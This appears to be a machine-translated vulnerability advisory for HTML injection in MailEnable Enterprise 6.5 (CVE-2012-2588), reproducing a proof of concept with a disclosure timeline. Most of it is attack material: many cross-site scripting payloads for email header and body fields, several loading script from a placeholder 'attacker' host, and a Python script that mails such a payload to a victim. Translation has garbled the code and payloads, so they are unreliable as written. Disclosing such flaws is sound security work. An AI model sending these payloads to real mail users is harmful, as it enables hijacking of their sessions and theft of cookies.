MailEnable Enterprise Multiple HTML Injection Vulnerabilities

Release date:
Updated on:

Affected Systems:
MailEnable Enterprise 6.5.
Description:
--------------------------------------------------------------------------------
Bugtraq id: 54900
Cve id: CVE-2012-2588

MailEnable Enterprise is an email server.

MailEnable Enterprise 6.5 and other versions have the HTML injection vulnerability. Attackers can provide HTML or JS Code to run on the affected site, steal Cookie authentication creden。, or control the site appearance.

<* Source: loneferret
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

#! /Usr/bin/python

'''

Author: loneferret of Offensive Security
Product: MailEnable Enterprise
Version: 6.5
Vendor Site: http://www.mailenable.com
Software Download: http://www.mailenable.com/download.asp

Timeline:
29 May 2012: Vulnerability reported to CERT
30 May 2012: Response received ed from CERT with disclosure date set to 20 Jul 2012
23 Jul 2012: Update from CERT: No response from vendor
08 Aug 2012: Public Disclosure

Installed On: Windows Server 2003 SP2
Client Test OS: Window 7 Pro SP1 (x86)
Browser Used: Internet Explorer 9

Injection Point: From
Injection Payload (s ):
1: '; alert (String. fromCharCode (88,83, 83) // \ '; alert (String. fromCharCode (88,83, 83) // "; alert (String. fromCharCode (88,83, 83) // \ "; alert (String. fromCharCode (88,83, 83) // --> </SCRIPT> "> '> <SCRIPT> alert (String. fromCharCode (88,83, 83) </SCRIPT >= &{}

Injection Point: Body
Injection Payload (s ):
1: '; alert (String. fromCharCode (88,83, 83) // \ '; alert (String. fromCharCode (88,83, 83) // "; alert (String. fromCharCode (88,83, 83) // \ "; alert (String. fromCharCode (88,83, 83) // --> </SCRIPT> "> '> <SCRIPT> alert (String. fromCharCode (88,83, 83) </SCRIPT >= &{}

Injection Point:
Injection Payload (s ):
1: <SCRIPT> alert ("XSS") </SCRIPT> ">
2: </TITLE> <SCRIPT> alert ("XSS"); </SCRIPT>

Injection Point: Subject
Injection Payload (s ):
1: <SCRIPT> alert ('xsss') </SCRIPT>
2: <script src = http: // attacker/xss. js> </SCRIPT>
3: <SCRIPT> alert (String. fromCharCode (88,83, 83) </SCRIPT>
4: <SCRIPT> alert ("XSS") </SCRIPT> ">
5: <SCRIPT> document. write ("<SCRI"); </SCRIPT> pt src = "http: // attacker/xss. js"> </SCRIPT>
6: <SCRIPT a = ">" SRC = "http: // attacker/xss. js"> </SCRIPT>
7: <SCRIPT a = "> '>" SRC = "http: // attacker/xss. js"> </SCRIPT>
8: <SCRIPT "a = '>'" SRC = "http: // attacker/xss. js"> </SCRIPT>
9: <SCRIPT = "blah" SRC = "http: // attacker/xss. js"> </SCRIPT>
10: <SCRIPT a = "blah" ''src = "http: // attacker/xss. js"> </SCRIPT>
11: <script src = "http: // attacker/xss.jpg"> </SCRIPT>
12: <SCRIPT a = '> 'src = "http: // attacker/xss. js"> </SCRIPT>
13: <SCRIPT/xss src = "http: // attacker/xss. js"> </SCRIPT>
14: </TITLE> <SCRIPT> alert ("XSS"); </SCRIPT>
15: <SCRIPT> alert ("XSS"); // </SCRIPT>
16: <iframe src = "javascript: alert ('xss');"> </IFRAME>

'''

#! /Usr/bin/python
Import smtplib, urllib2

Payload = "" <script src = http: // attacker/xss. js> </SCRIPT> """

Def sendMail (dstemail, frmemail, smtpsrv, username, password ):
Msg = "From: hacker@offsec.local \ n"
Msg + = "To: victim@victim.local \ n"
Msg + = 'date: Today \ r \ N'
Msg + = "Subject: XSS" + payload + "\ n"
Msg + = "Content-type: text/html \ n"
Msg + = "XSS. \ r \ n"
Server = smtplib. SMTP (smtpsrv)
Server. login (username, password)
Try:
Server. sendmail (frmemail, dstemail, msg)
Except t Exception, e:
Print "[-] Failed to send email :"
Print "[*]" + str (e)
Server. quit ()

Username = "hacker@offsec.local"
Password = "123456"
Dstemail = "victim@victim.local"
Frmemail = "hacker@offsec.local"
Smtpsrv = "172.16.84.171"

Print "[*] Sending Email"
SendMail (dstemail, frmemail, smtpsrv, username, password)

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

MailEnable
----------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://www.mailenable.com/